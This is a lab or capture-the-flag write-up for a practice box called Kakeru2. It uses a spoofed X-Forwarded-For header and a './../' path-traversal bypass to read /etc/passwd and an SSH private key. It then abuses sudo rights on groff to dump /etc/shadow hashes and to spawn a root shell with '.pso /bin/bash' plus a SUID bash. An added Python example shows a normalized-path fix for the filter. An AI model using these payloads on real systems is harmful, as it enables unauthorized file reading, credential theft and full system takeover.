Group member's box: Kakeru2 writeup

Web

A very ordinary box: I only exposed ports 80 and 22.
A curl of the home page shows a message left by guayu in the source:

<!--
你们的“安全系统”?不堪一击。 ;)
为了方便我下次“回来看看”,我留下了点东西
-guayu
-->

This tells us the system was compromised by guayu, who left a backdoor behind.
Next, directory enumeration. If you run dirsearch directly you will find nothing.
With gobuster and an explicit wordlist, a 403 for secret.php turns up, and its response length differs from the other 403 pages:

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.114.232/ -x php,txt,jpg,js,zip,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.114.232/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,jpg,js,zip,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/secret.php (Status: 403) [Size: 206]

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.114.232/secret.php
<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access this resource.</p> Maybe I only trust requests from localhost? </body></html>

To make the goal clearer, the page leaves a hint: the request should come from localhost. So add an X-Forwarded-For header:

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.114.232/secret.php -H "X-Forwarded-For: 127.0.0.1"

<h1>Guayu 的秘密文件通道</h1>
<div class="congrats">
<p><span class="highlight">恭喜你</span>你成功通过了第一道验证,找到了这个由 Guayu 精心留下的后门!</p>
<p>请小心使用,并非所有门都为你敞开...</p>
</div>

<p>当前识别的访问源: <span class="highlight">127.0.0.1</span> (已授权)</p>

<div class="container">
<h2>内部文件探测器 v2.0 </h2>

<p>输入文件的相对路径 (相对于此脚本位置) 或某些特定服务的已知路径。请注意,此工具内置了一些基本的<span class="highlight">路径安全检查</span></p>

<form method="GET" action="/secret.php">
<label for="filename">目标文件:</label>
<input type="text" id="filename" name="filename" placeholder="例如: welcome.txt 或 config/settings.ini" autocomplete="off" value="">
<input type="submit" value="[ 探测文件 ]">
</form>

</div>

<p style="margin-top: 40px; font-size: 0.85em; color: #666; text-align: center;">
-- 通道维护者: Guayu
</p>

This is a file-reading page with a filter. You can type a file name into the input box, or pass the filename parameter directly in the URL.
First, let's look at the current filtering logic of secret.php by reading the script through itself:

┌──(root㉿kakeru)-[~/tmp]
└─# curl "192.168.114.232/secret.php?filename=secret.php" -H "X-Forwarded-For: 127.0.0.1"

if (
substr($filename, 0, 1) === &#039;/&#039; ||
substr($filename, 0, 3) === &#039;../&#039; ||
strpos($filename, &#039;\\&#039;) !== false ||
strpos($filename, &#039;//&#039;) !== false ||
strpos($filename, &#039;...&#039;) !== false ||
strpos($filename, &#039;://&#039;) !== false
) {

So the filename may not start with /, may not use a "..." style overwrite bypass, and PHP wrappers (anything containing ://) are blocked.
The intended trick is to combine ./ (the current directory) with ../ so that no checked substring appears at the start of the string.
So test whether ./.././.././../etc/passwd lets us read a file:
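As an added example (not code from the original box or this writeup), the Python below reproduces the substring blacklist shown in the secret.php snippet and puts it beside a normalization-based check of the kind the page should have used: join the user input to the document root, normalize it, and require the result to stay under that root. The document root `/var/www/html` is an assumed value; the box's real path is not shown. `posixpath.normpath` is used instead of `realpath()` so the example runs without the files existing; a real PHP fix would call `realpath()` on the existing file so symlinks are resolved too.

```python
import posixpath
from typing import Optional

# Assumed document root for the example; the box's real web root is not shown in the writeup.
WEB_ROOT = "/var/www/html"


def blacklist_rejects(filename: str) -> bool:
    """Reproduces the substring blacklist from the page's secret.php snippet.

    Returns True when the filter would block the input, False when it lets it through.
    Every check is positional or substring-based, so "./../" slips past "../" at offset 0.
    """
    return (
        filename[:1] == "/"
        or filename[:3] == "../"
        or "\\" in filename
        or "//" in filename
        or "..." in filename
        or "://" in filename
    )


def resolve_under_root(filename: str, root: str = WEB_ROOT) -> Optional[str]:
    """Hardened alternative: normalize the joined path and require it to stay under root.

    Returns the normalized absolute path when it is inside root, otherwise None.
    Normalization collapses every "./" and "../" first, so what is compared is the
    path the filesystem would actually open, not the raw string.
    """
    if "\x00" in filename or "://" in filename:
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, filename))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def compare(filename: str) -> dict:
    """Side-by-side verdict of both checks for one input."""
    return {
        "blacklist_allows": not blacklist_rejects(filename),
        "normalized_allows": resolve_under_root(filename) is not None,
    }


if __name__ == "__main__":
    # Constructed sample inputs: the bypass from the writeup plus benign and blocked cases.
    samples = [
        "welcome.txt",
        "config/settings.ini",
        "../etc/passwd",
        "./.././.././../etc/passwd",
        "a/../../../etc/passwd",
    ]
    for sample in samples:
        print(f"{sample!r}: {compare(sample)}")
```

The bypass input and the `a/../../../etc/passwd` variant both pass the blacklist but resolve to `/etc/passwd` and `/var/etc/passwd` respectively, so the normalized check rejects them, while `config/settings.ini` is accepted by both.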

┌──(root㉿kakeru)-[~/tmp]
└─# curl "192.168.114.232/secret.php?filename=./.././.././../etc/passwd" -H "X-Forwarded-For: 127.0.0.1"

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
guayu:x:1000:1000:,,,:/home/guayu:/bin/bash

It works. There is also a guayu user, so reading /home/guayu/.ssh/id_rsa to obtain that user's private key lets us log in as guayu:

┌──(root㉿kakeru)-[~/tmp]
└─# chmod 600 id_rsa

┌──(root㉿kakeru)-[~/tmp]
└─# ls -al id_rsa
-rw------- 1 root root 3381 Jun 4 10:22 id_rsa

┌──(root㉿kakeru)-[~/tmp]
└─# ssh guayu@192.168.114.232 -i id_rsa
Linux Kakeru2 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 2 11:29:06 2025 from 192.168.114.11
guayu@Kakeru2:~$ ls id
ls: cannot access 'id': No such file or directory
guayu@Kakeru2:~$ id
uid=1000(guayu) gid=1000(guayu) groups=1000(guayu)

Privilege escalation

sudo -l shows that the groff command can be run; groff is a document formatting (typesetting) tool.

guayu@Kakeru2:~$ sudo -l
Matching Defaults entries for guayu on Kakeru2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User guayu may run the following commands on Kakeru2:
(ALL) NOPASSWD: /usr/bin/groff *

The first method is to use the tool itself to read files:

guayu@Kakeru2:~$ sudo /usr/bin/groff  -man -Tascii /etc/shadow
troff: /etc/shadow:1: warning [p 1, 0.0i]: cannot adjust line
troff: /etc/shadow:1: warning [p 1, 0.2i]: cannot adjust line
troff: /etc/shadow:26: warning [p 1, 2.5i]: cannot adjust line
troff: /etc/shadow:26: warning [p 1, 2.7i]: cannot adjust line
root:$6$TkJiunDYYH/8ETYb$Rbor5mqOT0O3bOcsMWEzgO2QvN2ttdlkJcM-
GIo5LDi4oxwESo0VsLx3zL0x3eA3L5MTNhyaGl7EUCbDi-
vBgeb/:20242:0:99999:7::: daemon:*:20166:0:99999:7:::
bin:*:20166:0:99999:7::: sys:*:20166:0:99999:7:::
sync:*:20166:0:99999:7::: games:*:20166:0:99999:7:::
man:*:20166:0:99999:7::: lp:*:20166:0:99999:7:::
mail:*:20166:0:99999:7::: news:*:20166:0:99999:7:::
uucp:*:20166:0:99999:7::: proxy:*:20166:0:99999:7::: www-da-
ta:*:20166:0:99999:7::: backup:*:20166:0:99999:7:::
list:*:20166:0:99999:7::: irc:*:20166:0:99999:7:::
gnats:*:20166:0:99999:7::: nobody:*:20166:0:99999:7:::
_apt:*:20166:0:99999:7::: systemd-timesync:*:20166:0:99999:7:::
systemd-network:*:20166:0:99999:7::: systemd-re-
solve:*:20166:0:99999:7::: systemd-coredump:!!:20166:::::: mes-
sagebus:*:20166:0:99999:7::: sshd:*:20166:0:99999:7:::
guayu:$6$TX3nztwWtmEYaSQI$xj7ofvrgPmkM4tQ-
CY8hUV1P905H3yvz3F90KYq/tHUDcD8cCAhT92.vNIRz8Iyu9vLHBmXQY-
BXFC.akO2XKb2/:20241:0:99999:7:::


After tidying up the wrapped format of the root line, the password can be brute-forced (it takes roughly 4 to 5 minutes).

The second method is to execute commands with -U.
Write a .roff file and run it with -U:

echo '.pso /bin/bash' > payload.roff
sudo /usr/bin/groff -U payload.roff

The .pso request makes groff invoke an external program and read its output, so the shell it spawns runs as root:

guayu@Kakeru2:~$ sudo /usr/bin/groff -U payload.roff 
root@Kakeru2:/home/guayu# chmod +s /bin/bash
root@Kakeru2:/home/guayu# exit
exit
guayu@Kakeru2:~$ bash -p
bash-5.0# id
uid=1000(guayu) gid=1000(guayu) euid=0(root) egid=0(root) groups=0(root),1000(guayu)

Of course, since this tool can read files directly, reading the flag straight away would work as well.